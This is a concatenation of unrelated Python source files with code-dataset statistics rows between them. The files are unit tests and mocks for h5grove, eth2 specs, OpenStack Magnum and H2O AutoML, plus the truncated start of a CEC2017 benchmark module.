    # Decorated no-op fixture; presumably this file only needs to parse
    # (decorator-whitespace parser test) — confirm against the test harness.
    pass
| 8.9
| 37
| 0.573034
| 17
| 89
| 2.882353
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.280899
| 89
| 9
| 38
| 9.888889
| 0.765625
| 0.393258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.2
| 0
| 0.2
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 6
|
31e480b02abea915111647c95c60232d357fc089
| 342
|
py
|
Python
|
test/test_utils.py
|
silx-kit/h5grove
|
97dbbfd86c9498744ff387b49e6aa484d2f78cbb
|
[
"MIT"
] | 2
|
2022-02-04T18:56:52.000Z
|
2022-02-18T04:46:18.000Z
|
test/test_utils.py
|
silx-kit/h5grove
|
97dbbfd86c9498744ff387b49e6aa484d2f78cbb
|
[
"MIT"
] | 19
|
2021-06-29T13:03:30.000Z
|
2022-03-25T12:58:16.000Z
|
test/test_utils.py
|
silx-kit/h5grove
|
97dbbfd86c9498744ff387b49e6aa484d2f78cbb
|
[
"MIT"
] | null | null | null |
from h5grove.utils import hdf_path_join
def test_root_path_join():
    """Joining a child onto the root yields a single-slash path."""
    assert hdf_path_join("/", "child") == "/child"
def test_group_path_join():
    """Joining onto a nested group inserts exactly one separator."""
    assert hdf_path_join("/group1/group2", "data") == "/group1/group2/data"
def test_group_path_join_trailing():
    """A trailing slash on the group must not produce a double separator."""
    assert hdf_path_join("/group1/group2/", "data") == "/group1/group2/data"
| 24.428571
| 76
| 0.710526
| 49
| 342
| 4.591837
| 0.346939
| 0.248889
| 0.195556
| 0.226667
| 0.724444
| 0.582222
| 0.435556
| 0.435556
| 0.435556
| 0.435556
| 0
| 0.0301
| 0.125731
| 342
| 13
| 77
| 26.307692
| 0.722408
| 0
| 0
| 0
| 0
| 0
| 0.254386
| 0
| 0
| 0
| 0
| 0
| 0.428571
| 1
| 0.428571
| true
| 0
| 0.142857
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9ec5296498e0533b534871a19bc71c6d137fc5da
| 180
|
py
|
Python
|
src/collectd/registry.py
|
rdejoux/python-collectd-mock
|
4b42b108cd81cf9021dc8bdf85829ac827da682e
|
[
"MIT"
] | null | null | null |
src/collectd/registry.py
|
rdejoux/python-collectd-mock
|
4b42b108cd81cf9021dc8bdf85829ac827da682e
|
[
"MIT"
] | 2
|
2018-11-01T03:37:25.000Z
|
2020-01-24T09:04:57.000Z
|
src/collectd/registry.py
|
rdejoux/python-collectd-mock
|
4b42b108cd81cf9021dc8bdf85829ac827da682e
|
[
"MIT"
] | 2
|
2017-06-22T18:58:07.000Z
|
2018-10-31T12:05:06.000Z
|
def register_init(func):
    # Mock of collectd's register_init: the callback is accepted and ignored.
    pass
def register_config(func):
    # Mock of collectd's register_config: the callback is accepted and ignored.
    pass
def register_read(func):
    # Mock of collectd's register_read: the callback is accepted and ignored.
    pass
def register_write(func):
    # Mock of collectd's register_write: the callback is accepted and ignored.
    pass
def info(msg):
    # Mock of collectd's info logger: echo the message to stdout.
    print(msg)
| 8.181818
| 26
| 0.65
| 25
| 180
| 4.52
| 0.44
| 0.389381
| 0.389381
| 0.504425
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255556
| 180
| 21
| 27
| 8.571429
| 0.843284
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.4
| 0
| 0
| 0.5
| 0.1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
9eca9a92ab0e2049f1ea1694252391a13327f37d
| 4,089
|
py
|
Python
|
tests/core/pyspec/eth2spec/test/altair/rewards/test_inactivity_scores.py
|
jmyllyla/eth2.0-specs
|
68692f823201dbae61d94e8747b690412b7b8505
|
[
"CC0-1.0"
] | null | null | null |
tests/core/pyspec/eth2spec/test/altair/rewards/test_inactivity_scores.py
|
jmyllyla/eth2.0-specs
|
68692f823201dbae61d94e8747b690412b7b8505
|
[
"CC0-1.0"
] | null | null | null |
tests/core/pyspec/eth2spec/test/altair/rewards/test_inactivity_scores.py
|
jmyllyla/eth2.0-specs
|
68692f823201dbae61d94e8747b690412b7b8505
|
[
"CC0-1.0"
] | null | null | null |
from random import Random
from eth2spec.test.context import (
with_altair_and_later,
spec_test,
spec_state_test,
with_custom_state,
single_phase,
low_balances, misc_balances,
)
from eth2spec.test.helpers.inactivity_scores import randomize_inactivity_scores
from eth2spec.test.helpers.rewards import leaking
import eth2spec.test.helpers.rewards as rewards_helpers
@with_altair_and_later
@spec_state_test
def test_random_inactivity_scores_0(spec, state):
    """Full-random rewards run with fully randomized inactivity scores (seed 9999)."""
    randomize_inactivity_scores(spec, state, rng=Random(9999))
    yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(9999))
@with_altair_and_later
@spec_state_test
def test_random_inactivity_scores_1(spec, state):
    """Same as test_random_inactivity_scores_0 with a different seed (10000)."""
    randomize_inactivity_scores(spec, state, rng=Random(10000))
    yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(10000))
@with_altair_and_later
@spec_state_test
def test_half_zero_half_random_inactivity_scores(spec, state):
    """First half of validators get zero inactivity scores, second half random."""
    randomize_inactivity_scores(spec, state, rng=Random(10101))
    half_val_point = len(state.validators) // 2
    state.inactivity_scores = [0] * half_val_point + state.inactivity_scores[half_val_point:]
    yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(10101))
@with_altair_and_later
@spec_state_test
def test_random_high_inactivity_scores(spec, state):
    """Rewards run with inactivity scores randomized in a high band (500k..5M)."""
    randomize_inactivity_scores(spec, state, minimum=500000, maximum=5000000, rng=Random(9998))
    yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(9998))
@with_altair_and_later
@with_custom_state(balances_fn=low_balances, threshold_fn=lambda spec: spec.EJECTION_BALANCE)
@spec_test
@single_phase
def test_random_inactivity_scores_low_balances_0(spec, state):
    """Randomized inactivity scores over a low-balance validator set (seed 11111)."""
    randomize_inactivity_scores(spec, state, rng=Random(11111))
    yield from rewards_helpers.run_test_full_random(spec, state)
@with_altair_and_later
@with_custom_state(balances_fn=low_balances, threshold_fn=lambda spec: spec.EJECTION_BALANCE)
@spec_test
@single_phase
def test_random_inactivity_scores_low_balances_1(spec, state):
    """Randomized inactivity scores over a low-balance validator set (seed 22222)."""
    randomize_inactivity_scores(spec, state, rng=Random(22222))
    yield from rewards_helpers.run_test_full_random(spec, state)
@with_altair_and_later
@with_custom_state(balances_fn=misc_balances, threshold_fn=lambda spec: spec.EJECTION_BALANCE)
@spec_test
@single_phase
def test_full_random_misc_balances(spec, state):
    """Randomized inactivity scores over a mixed-balance validator set (seed 33333)."""
    randomize_inactivity_scores(spec, state, rng=Random(33333))
    yield from rewards_helpers.run_test_full_random(spec, state)
#
# Leaking variants
#
@with_altair_and_later
@spec_state_test
@leaking()
def test_random_inactivity_scores_leaking_0(spec, state):
    """Leak-mode variant of test_random_inactivity_scores_0 (seed 9999)."""
    randomize_inactivity_scores(spec, state, rng=Random(9999))
    yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(9999))
@with_altair_and_later
@spec_state_test
@leaking()
def test_random_inactivity_scores_leaking_1(spec, state):
    """Leak-mode variant of test_random_inactivity_scores_1 (seed 10000)."""
    randomize_inactivity_scores(spec, state, rng=Random(10000))
    yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(10000))
@with_altair_and_later
@spec_state_test
@leaking()
def test_half_zero_half_random_inactivity_scores_leaking(spec, state):
    """Leak-mode variant: half zero, half random inactivity scores (seed 10101)."""
    randomize_inactivity_scores(spec, state, rng=Random(10101))
    half_val_point = len(state.validators) // 2
    state.inactivity_scores = [0] * half_val_point + state.inactivity_scores[half_val_point:]
    yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(10101))
@with_altair_and_later
@spec_state_test
@leaking()
def test_random_high_inactivity_scores_leaking(spec, state):
    """Leak-mode variant of the high-band inactivity-score test (seed 9998)."""
    randomize_inactivity_scores(spec, state, minimum=500000, maximum=5000000, rng=Random(9998))
    yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(9998))
@with_altair_and_later
@spec_state_test
@leaking(epochs=5)
def test_random_high_inactivity_scores_leaking_5_epochs(spec, state):
    """Same high-band leak test, but with the leak sustained for 5 epochs."""
    randomize_inactivity_scores(spec, state, minimum=500000, maximum=5000000, rng=Random(9998))
    yield from rewards_helpers.run_test_full_random(spec, state, rng=Random(9998))
| 34.361345
| 95
| 0.816581
| 596
| 4,089
| 5.192953
| 0.098993
| 0.133764
| 0.06979
| 0.104685
| 0.887561
| 0.880452
| 0.87916
| 0.864943
| 0.84685
| 0.817448
| 0
| 0.040661
| 0.097823
| 4,089
| 118
| 96
| 34.652542
| 0.798319
| 0.003913
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.137931
| false
| 0
| 0.057471
| 0
| 0.195402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
732babc5e94304f3c0074fa955851d6f98a6ccac
| 12,659
|
py
|
Python
|
magnum/tests/unit/common/test_neutron.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 319
|
2015-04-01T01:36:14.000Z
|
2022-01-18T13:21:46.000Z
|
magnum/tests/unit/common/test_neutron.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 10
|
2015-06-05T20:12:46.000Z
|
2018-10-17T09:14:22.000Z
|
magnum/tests/unit/common/test_neutron.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 254
|
2015-03-30T13:56:06.000Z
|
2022-03-26T03:40:22.000Z
|
# Copyright 2019 Catalyst Cloud Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from magnum.common import exception
from magnum.common import neutron
from magnum import objects
from magnum.tests import base
from magnum.tests.unit.db import utils
class NeutronTest(base.TestCase):
def setUp(self):
    """Build a single-node test cluster with a master and a worker nodegroup."""
    super(NeutronTest, self).setUp()
    cluster_dict = utils.get_test_cluster(node_count=1)
    nodegroups_dict = utils.get_nodegroups_for_cluster(node_count=1)
    self.cluster = objects.Cluster(self.context, **cluster_dict)
    self.nodegroups = [
        objects.NodeGroup(self.context, **nodegroups_dict['master']),
        objects.NodeGroup(self.context, **nodegroups_dict['worker'])
    ]
@mock.patch('magnum.common.clients.OpenStackClients')
def test_delete_floatingip(self, mock_clients):
    """A FIP attached to the given port for this cluster is deleted by id."""
    mock_nclient = mock.MagicMock()
    fake_port_id = "b4518944-c2cf-4c69-a1e3-774041fd5d14"
    fake_fip_id = "0f8c6849-af85-424c-aa8e-745ade9a46a7"
    # One floating IP whose description ties it to self.cluster.
    mock_nclient.list_floatingips.return_value = {
        'floatingips': [
            {
                'router_id': '6ed4f7ef-b8c3-4711-93cf-d53cf0e8bdf5',
                'status': 'ACTIVE',
                'description': 'Floating IP for Kubernetes external '
                               'service ad3080723f1c211e88adbfa163ee1203 '
                               'from cluster %s' % self.cluster.uuid,
                'tags': [],
                'tenant_id': 'cd08a539b7c845ddb92c5d08752101d1',
                'floating_network_id': 'd0b9a8c5-33e5-4ce1-869a-1e2ec7c2f'
                                       '74b',
                'port_details': {
                    'status': 'ACTIVE',
                    'name': 'test-k8s-master',
                    'admin_state_up': True,
                    'network_id': '7b9110b5-90a2-40bc-b892-07d641387760 ',
                    'device_owner': 'compute:nova',
                    'mac_address': 'fa:16:3e:6f:ad:6c',
                    'device_id': 'a5c1689f-dd76-4164-8562-6990071701cd'
                },
                'fixed_ip_address': '10.0.0.4',
                'floating_ip_address': '172.24.4.74',
                'revision_number': 14,
                'project_id': 'cd08a539b7c845ddb92c5d08752101d1',
                'port_id': fake_port_id,
                'id': fake_fip_id
            }
        ]
    }
    osc = mock.MagicMock()
    mock_clients.return_value = osc
    osc.neutron.return_value = mock_nclient
    neutron.delete_floatingip(self.context, fake_port_id, self.cluster)
    # The matching FIP must be deleted exactly once, by its id.
    mock_nclient.delete_floatingip.assert_called_once_with(fake_fip_id)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_delete_floatingip_empty(self, mock_clients):
    """No floating IPs listed -> no delete call is made."""
    mock_nclient = mock.MagicMock()
    fake_port_id = "b4518944-c2cf-4c69-a1e3-774041fd5d14"
    mock_nclient.list_floatingips.return_value = {
        'floatingips': []
    }
    osc = mock.MagicMock()
    mock_clients.return_value = osc
    osc.neutron.return_value = mock_nclient
    neutron.delete_floatingip(self.context, fake_port_id, self.cluster)
    self.assertFalse(mock_nclient.delete_floatingip.called)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_delete_floatingip_exception(self, mock_clients):
    """A neutron failure during FIP delete surfaces as PreDeletionFailed."""
    mock_nclient = mock.MagicMock()
    fake_port_id = "b4518944-c2cf-4c69-a1e3-774041fd5d14"
    fake_fip_id = "0f8c6849-af85-424c-aa8e-745ade9a46a7"
    # Same single matching FIP as in test_delete_floatingip.
    mock_nclient.list_floatingips.return_value = {
        'floatingips': [
            {
                'router_id': '6ed4f7ef-b8c3-4711-93cf-d53cf0e8bdf5',
                'status': 'ACTIVE',
                'description': 'Floating IP for Kubernetes external '
                               'service ad3080723f1c211e88adbfa163ee1203 '
                               'from cluster %s' % self.cluster.uuid,
                'tags': [],
                'tenant_id': 'cd08a539b7c845ddb92c5d08752101d1',
                'floating_network_id': 'd0b9a8c5-33e5-4ce1-869a-1e2ec7c2f'
                                       '74b',
                'port_details': {
                    'status': 'ACTIVE',
                    'name': 'test-k8s-master',
                    'admin_state_up': True,
                    'network_id': '7b9110b5-90a2-40bc-b892-07d641387760 ',
                    'device_owner': 'compute:nova',
                    'mac_address': 'fa:16:3e:6f:ad:6c',
                    'device_id': 'a5c1689f-dd76-4164-8562-6990071701cd'
                },
                'fixed_ip_address': '10.0.0.4',
                'floating_ip_address': '172.24.4.74',
                'revision_number': 14,
                'project_id': 'cd08a539b7c845ddb92c5d08752101d1',
                'port_id': fake_port_id,
                'id': fake_fip_id
            }
        ]
    }
    # Force the delete call itself to blow up.
    mock_nclient.delete_floatingip.side_effect = Exception
    osc = mock.MagicMock()
    mock_clients.return_value = osc
    osc.neutron.return_value = mock_nclient
    self.assertRaises(
        exception.PreDeletionFailed,
        neutron.delete_floatingip,
        self.context,
        fake_port_id,
        self.cluster
    )
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_external_network_id(self, mock_clients):
fake_name = "fake_network"
fake_id = "24fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_networks.return_value = {
'networks': [
{
'id': fake_id,
'name': fake_name,
'router:external': True
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
network_id = neutron.get_external_network_id(self.context, fake_name)
self.assertEqual(fake_id, network_id)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_external_network_id_notfound(self, mock_clients):
fake_name = "fake_network"
fake_id = "24fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_networks.return_value = {
'networks': [
{
'id': fake_id,
'name': fake_name,
'router:external': True
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.ExternalNetworkNotFound,
neutron.get_external_network_id,
self.context,
"another_network"
)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_external_network_id_conflict(self, mock_clients):
fake_name = "fake_network"
fake_id_1 = "24fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
fake_id_2 = "93781f82-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_networks.return_value = {
'networks': [
{
'id': fake_id_1,
'name': fake_name,
'router:external': True
},
{
'id': fake_id_2,
'name': fake_name,
'router:external': True
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.Conflict,
neutron.get_external_network_id,
self.context,
fake_name
)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_fixed_network_name(self, mock_clients):
fake_name = "fake_network"
fake_id = "24fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_networks.return_value = {
'networks': [
{
'id': fake_id,
'name': fake_name,
'router:external': False
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
network_name = neutron.get_fixed_network_name(self.context, fake_id)
self.assertEqual(fake_name, network_name)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_fixed_network_name_notfound(self, mock_clients):
fake_name = "fake_network"
fake_id = "24fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
another_fake_id = "34fe5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_networks.return_value = {
'networks': [
{
'id': fake_id,
'name': fake_name,
'router:external': False
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.FixedNetworkNotFound,
neutron.get_fixed_network_name,
self.context,
another_fake_id
)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_fixed_subnet_id(self, mock_clients):
fake_name = "fake_subnet"
fake_id = "35ee5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_subnets.return_value = {
'subnets': [
{
'id': fake_id,
'name': fake_name,
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
subnet_id = neutron.get_fixed_subnet_id(self.context, fake_name)
self.assertEqual(fake_id, subnet_id)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_fixed_subnet_id_notfound(self, mock_clients):
fake_name = "fake_subnet"
fake_id = "35ee5da0-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_subnets.return_value = {
'subnets': [
{
'id': fake_id,
'name': fake_name,
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.FixedSubnetNotFound,
neutron.get_fixed_subnet_id,
self.context,
"another_subnet"
)
@mock.patch('magnum.common.clients.OpenStackClients')
def test_get_fixed_subnet_id_conflict(self, mock_clients):
fake_name = "fake_subnet"
fake_id_1 = "35ee5da0-1ac0-11e9-84cd-00224d6b7bc1"
fake_id_2 = "93781f82-1ac0-11e9-84cd-00224d6b7bc1"
mock_nclient = mock.MagicMock()
mock_nclient.list_subnets.return_value = {
'subnets': [
{
'id': fake_id_1,
'name': fake_name,
},
{
'id': fake_id_2,
'name': fake_name,
}
]
}
osc = mock.MagicMock()
mock_clients.return_value = osc
osc.neutron.return_value = mock_nclient
self.assertRaises(
exception.Conflict,
neutron.get_fixed_subnet_id,
self.context,
fake_name
)
| 35.963068
| 78
| 0.55581
| 1,234
| 12,659
| 5.43517
| 0.175851
| 0.059043
| 0.048159
| 0.034442
| 0.821381
| 0.818995
| 0.804085
| 0.7686
| 0.765022
| 0.72402
| 0
| 0.08166
| 0.350897
| 12,659
| 351
| 79
| 36.065527
| 0.734575
| 0.046054
| 0
| 0.647458
| 0
| 0
| 0.210081
| 0.121705
| 0
| 0
| 0
| 0
| 0.037288
| 1
| 0.040678
| false
| 0
| 0.020339
| 0
| 0.064407
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
733e6a17282d9c3babef01f0e484c5bff3b41f16
| 87
|
py
|
Python
|
eds/openmtc-gevent/common/openmtc-etsi/src/openmtc_etsi/serializer/xml/exc.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
eds/openmtc-gevent/common/openmtc-etsi/src/openmtc_etsi/serializer/xml/exc.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
eds/openmtc-gevent/common/openmtc-etsi/src/openmtc_etsi/serializer/xml/exc.py
|
piyush82/elastest-device-emulator-service
|
b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7
|
[
"Apache-2.0"
] | null | null | null |
from openmtc_etsi.exc import SCLSyntaxError
class XMLError(SCLSyntaxError):
    """XML-specific specialization of :class:`SCLSyntaxError`."""
| 14.5
| 43
| 0.804598
| 10
| 87
| 6.9
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149425
| 87
| 5
| 44
| 17.4
| 0.932432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
b41799e881a66a8ef586c38e9d0efec9589ae733
| 94
|
py
|
Python
|
db/tests/fixtures/faq_category.py
|
matchd-ch/matchd-backend
|
84be4aab1b4708cae50a8988301b15df877c8db0
|
[
"Apache-2.0"
] | 1
|
2022-03-03T09:55:57.000Z
|
2022-03-03T09:55:57.000Z
|
db/tests/fixtures/faq_category.py
|
matchd-ch/matchd-backend
|
84be4aab1b4708cae50a8988301b15df877c8db0
|
[
"Apache-2.0"
] | 7
|
2022-02-09T10:44:53.000Z
|
2022-03-28T03:29:43.000Z
|
db/tests/fixtures/faq_category.py
|
matchd-ch/matchd-backend
|
84be4aab1b4708cae50a8988301b15df877c8db0
|
[
"Apache-2.0"
] | null | null | null |
import pytest
@pytest.fixture
def faq_category_valid_args():
    """Minimal keyword arguments considered valid for an FAQ category."""
    return dict(name='General')
| 13.428571
| 30
| 0.723404
| 12
| 94
| 5.416667
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148936
| 94
| 6
| 31
| 15.666667
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0.117021
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
b41a89a54fe8a1b25e8c553fb3cda69a73033c63
| 3,276
|
py
|
Python
|
h2o-py/tests/testdir_algos/automl/pyunit_automl_monotone_constraints.py
|
vishalbelsare/h2o-3
|
9322fb0f4c0e2358449e339a434f607d524c69fa
|
[
"Apache-2.0"
] | 1
|
2022-03-15T06:08:14.000Z
|
2022-03-15T06:08:14.000Z
|
h2o-py/tests/testdir_algos/automl/pyunit_automl_monotone_constraints.py
|
vishalbelsare/h2o-3
|
9322fb0f4c0e2358449e339a434f607d524c69fa
|
[
"Apache-2.0"
] | 58
|
2021-10-01T12:43:37.000Z
|
2021-12-08T22:58:43.000Z
|
h2o-py/tests/testdir_algos/automl/pyunit_automl_monotone_constraints.py
|
vishalbelsare/h2o-3
|
9322fb0f4c0e2358449e339a434f607d524c69fa
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
import sys, os
import re
sys.path.insert(1, os.path.join("..","..",".."))
import h2o
import h2o.exceptions
from h2o.automl import H2OAutoML
from tests import pyunit_utils as pu
from _automl_utils import import_dataset, get_partitioned_model_names
# NOTE(review): the tests below pass max_models=6 explicitly; confirm this
# module-level value is still referenced anywhere.
max_models = 5
def test_monotone_constraints():
    """AutoML forwards monotone_constraints to the algos that support it."""
    ds = import_dataset()
    aml = H2OAutoML(project_name="py_monotone_constraints",
                    # constraints just for the sake of testing
                    monotone_constraints=dict(AGE=1, VOL=-1),
                    max_models=6,
                    seed=1)
    aml.train(y=ds.target, training_frame=ds.train)

    names = get_partitioned_model_names(aml.leaderboard).all
    constrained = [n for n in names if re.match(r"GBM|XGBoost", n)]
    assert len(constrained) < len(names), \
        "models not supporting the constraint should not have been skipped"
    for name in constrained:
        params = h2o.get_model(name).params
        actual = next(v['actual'] for k, v in params.items()
                      if k == 'monotone_constraints')
        assert isinstance(actual, list)
        assert len(actual) == 2
        # constraints come back as [{'key': ..., 'value': ...}, ...]
        by_key = {c['key']: c['value'] for c in actual}
        assert by_key.get('AGE') == 1.0
        assert by_key.get('VOL') == -1.0
def test_monotone_constraints_can_be_passed_as_algo_parameter():
    """monotone_constraints is also honored when nested in algo_parameters."""
    ds = import_dataset()
    aml = H2OAutoML(project_name="py_monotone_constraints",
                    algo_parameters=dict(
                        # constraints just for the sake of testing
                        monotone_constraints=dict(AGE=1, VOL=-1),
                    ),
                    max_models=6,
                    seed=1)
    aml.train(y=ds.target, training_frame=ds.train)

    names = get_partitioned_model_names(aml.leaderboard).all
    constrained = [n for n in names if re.match(r"GBM|XGBoost", n)]
    assert len(constrained) < len(names), \
        "models not supporting the constraint should not have been skipped"
    for name in constrained:
        params = h2o.get_model(name).params
        actual = next(v['actual'] for k, v in params.items()
                      if k == 'monotone_constraints')
        assert isinstance(actual, list)
        assert len(actual) == 2
        # constraints come back as [{'key': ..., 'value': ...}, ...]
        by_key = {c['key']: c['value'] for c in actual}
        assert by_key.get('AGE') == 1.0
        assert by_key.get('VOL') == -1.0
# Register both tests with the pyunit runner.
pu.run_tests([test_monotone_constraints,
              test_monotone_constraints_can_be_passed_as_algo_parameter])
| 41.468354
| 109
| 0.648657
| 459
| 3,276
| 4.431373
| 0.213508
| 0.149459
| 0.070796
| 0.103245
| 0.806293
| 0.782694
| 0.782694
| 0.782694
| 0.782694
| 0.734513
| 0
| 0.013765
| 0.246032
| 3,276
| 78
| 110
| 42
| 0.809717
| 0.123321
| 0
| 0.7
| 0
| 0
| 0.104858
| 0.016078
| 0
| 0
| 0
| 0
| 0.233333
| 1
| 0.033333
| false
| 0.033333
| 0.166667
| 0
| 0.2
| 0.016667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b42a2262415a814af7735e6c00c6073e77532dbd
| 12,648
|
py
|
Python
|
cec2017/hybrid.py
|
tilleyd/cec2017-py
|
5b47cc36c3723c9b6c2e6dd26328b2de45e4993f
|
[
"MIT"
] | 16
|
2020-04-06T04:34:38.000Z
|
2022-03-24T12:29:57.000Z
|
cec2017/hybrid.py
|
lukaa12/cec2017-py
|
0c241240bfaf11d0f42a607a235b1825ad11e4f7
|
[
"MIT"
] | 3
|
2021-07-17T20:46:48.000Z
|
2022-03-28T06:48:47.000Z
|
cec2017/hybrid.py
|
lukaa12/cec2017-py
|
0c241240bfaf11d0f42a607a235b1825ad11e4f7
|
[
"MIT"
] | 4
|
2021-05-26T19:32:53.000Z
|
2022-03-24T13:27:30.000Z
|
# cec2017.hybrid
# Author: Duncan Tilley
# Hybrid function definitions, f11 to f20
from . import basic
from . import transforms
import numpy as np
def _shuffle_and_partition(x, shuffle, partitions):
"""
First applies the given permutation, then splits x into partitions given
the percentages.
Args:
x (array): Input vector.
shuffle (array): Shuffle vector.
